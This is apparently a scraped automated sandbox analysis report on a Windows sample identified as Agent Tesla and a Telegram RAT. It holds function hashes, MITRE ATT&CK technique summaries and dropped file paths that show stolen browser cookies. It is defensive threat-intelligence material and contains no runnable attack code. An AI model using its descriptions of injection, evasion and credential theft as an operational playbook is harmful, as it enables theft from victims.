Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cc26acf41f5c7465592f49642f00cd41b7d787aabb78555f675c0a78081ece
Instruction ID: d168509d43e257ed88a972f28726310725a5ac5020617cc89e536eedbcd22899
Opcode Fuzzy Hash: 63cc26acf41f5c7465592f49642f00cd41b7d787aabb78555f675c0a78081ece
Instruction Fuzzy Hash: 7CB1B770F102098FDF64DBA9C4A0BBE77A6FF85710F2548A9E909D7392CE68DC418751

Function 06755748 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eaaafe2189dc7b8cf6a830dfa103e06c4a252c33b6350c87357519b376f63d1
Instruction ID: 2055ab2098ae0595eb55882b13ea2e57456ada7520dd248e4a6cacf29fb7212f
Opcode Fuzzy Hash: 5eaaafe2189dc7b8cf6a830dfa103e06c4a252c33b6350c87357519b376f63d1
Instruction Fuzzy Hash: B841AE31E106098FEF60CEA9C8C0ABFFBB6FB44310F11896AE615D7600D770B9458B91

Function 0675FE48 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91f8b1cbfe353b198266872600261510e5db337ca52b83379fab108fcaf1ba3
Instruction ID: c012cb6fe2df799b6b44e66d7bc0cd162490c1a543db9f98f6f01290163b3415
Opcode Fuzzy Hash: f91f8b1cbfe353b198266872600261510e5db337ca52b83379fab108fcaf1ba3
Instruction Fuzzy Hash: 033103716043848FC711EF39C8455AEBBF6EF85200B1588AED546DB352EF75E80ACB91

Function 06754280 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e6f48650c78f9579017ac1ea1bfb0623abbd6784fe3a12f87fb6686d8240498
Instruction ID: 8b7212df3b03b7d0e0d3b9f7de974b7adedca3927728ed769e1e25f45998472c
Opcode Fuzzy Hash: 6e6f48650c78f9579017ac1ea1bfb0623abbd6784fe3a12f87fb6686d8240498
Instruction Fuzzy Hash: EA11C132B100154BDB44D77989186BE76EBEBC8354F1184B9D90AEB344DE76DD028791

Function 06754270 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14473afaf144962e03337ec248283f87f494a6a8be6e37f7abe2fc0dd212f9a4
Instruction ID: 5db2c4e917bf8906b59a1af4239458f1144a9afb8bffe7b7beb8737ccc815a85
Opcode Fuzzy Hash: 14473afaf144962e03337ec248283f87f494a6a8be6e37f7abe2fc0dd212f9a4
Instruction Fuzzy Hash: 38010432B100151BDB5492B98C186EF67DBA7C8754F014079E90AE7241EE62CC0603A1

Function 0675FE3B Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c12d0c57b7119b9ba21a76b1a6d0801bd27af062649bbbbfe681f3c0ee7326
Instruction ID: 1b133699b34196e47d2f9187815a6f112e1f67c2263053fbcf5a74ab839afb4d
Opcode Fuzzy Hash: b4c12d0c57b7119b9ba21a76b1a6d0801bd27af062649bbbbfe681f3c0ee7326
Instruction Fuzzy Hash: 232105706002458FC751EB29C8498AFBBF5EF81300B0585AAD546DB391EF74E905CBD2

Function 067544F1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c69e1cfdc7a487325a429184f70f34afc144daf8872a1a8cc1224d31b5df8c9
Instruction ID: fbefd1a50564219d5ee2aa2790d4f7918951144b37828f9bcf4d1382ef1092e8
Opcode Fuzzy Hash: 9c69e1cfdc7a487325a429184f70f34afc144daf8872a1a8cc1224d31b5df8c9
Instruction Fuzzy Hash: FC01F9317001100FDB119A6DD458B6AB7EBDBC9710F118875F50EC7345EE56DD824795

Function 06753F10 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10879178c2e6927f320962758093a8ba6e1546aca4ce1da8a2bdaaa98f2dd262
Instruction ID: dc6fa50e1c7d0858dd9ca94eaf85d6ec1ab9d7548a031670705021f8d3d3082a
Opcode Fuzzy Hash: 10879178c2e6927f320962758093a8ba6e1546aca4ce1da8a2bdaaa98f2dd262
Instruction Fuzzy Hash: C521C0B5D01219AFCB50DF9AD988ADEFBB8FB48320F10812AE918A7240D3746554CFE5

Function 0675ABE3 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2d29ce37987c8bc77941bd28566137e26412f92a313da087abc8844b67a09d
Instruction ID: bc42b1bf9f5a60164331b4016a1079f8ea7bc399c05ca3d8cde80dcfd11722ff
Opcode Fuzzy Hash: ca2d29ce37987c8bc77941bd28566137e26412f92a313da087abc8844b67a09d
Instruction Fuzzy Hash: 1001D434F000400BDB56A6789965B7F6BE6DBCA641F018ABDF50BCB381DF69CC468785

Function 06753F18 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25bc612febc272161e67ac996d0e84629ddd656147ae546d719948c3510577bd
Instruction ID: 688544ecbc321560b653fcd820d48aaef571611a61fff3f501c55dccf0e81eda
Opcode Fuzzy Hash: 25bc612febc272161e67ac996d0e84629ddd656147ae546d719948c3510577bd
Instruction Fuzzy Hash: 8811C2B1D012199FCB00DF9AD884ADEFBB8FB48310F10812AE918A7240D3746554CFE5

Function 0675ABF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6319e95d234fc40be443ac761b933a5444be9bc782d47970e19e14871182082c
Instruction ID: 17b3b29eec1729d3fd9e80272cca45eed23e58bdcfa4624239fa8033c75d8d40
Opcode Fuzzy Hash: 6319e95d234fc40be443ac761b933a5444be9bc782d47970e19e14871182082c
Instruction Fuzzy Hash: 5F01FD34F000040BDB25A6BD9855B2E67E6EBCA640F01893CF90BCB380EF6ADC428785

Function 067567E9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce4ae42380cc4987fdb0a6595a16c03bd2b9c8f6fee3a546f79d964aa4a785a
Instruction ID: 1e61963ca38fca11bea320709b470f0cf4ac09eea44191cdff0b5eb24dc5efc6
Opcode Fuzzy Hash: 3ce4ae42380cc4987fdb0a6595a16c03bd2b9c8f6fee3a546f79d964aa4a785a
Instruction Fuzzy Hash: A4E02271D052486BCB40CAB48C087AA77ACA703210F5285D1E818CB212E2B5DE0283A2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IUqsn1SBGy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppPoint.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IUqsn1SBGy.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0baoyk3y.dfs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0aht11y.imd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbbtgkm2.o2b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f51ijsru.1n3.ps1

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Chrome\Default\Network\Cookies

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Edge Chromium\Default\Network\Cookies

C:\Users\user\AppData\Roaming\cio2h2mq.ale\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Windows Analysis Report
IUqsn1SBGy.exe

Function 0A56ACFC Relevance: 6.9, Strings: 5, Instructions: 623
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre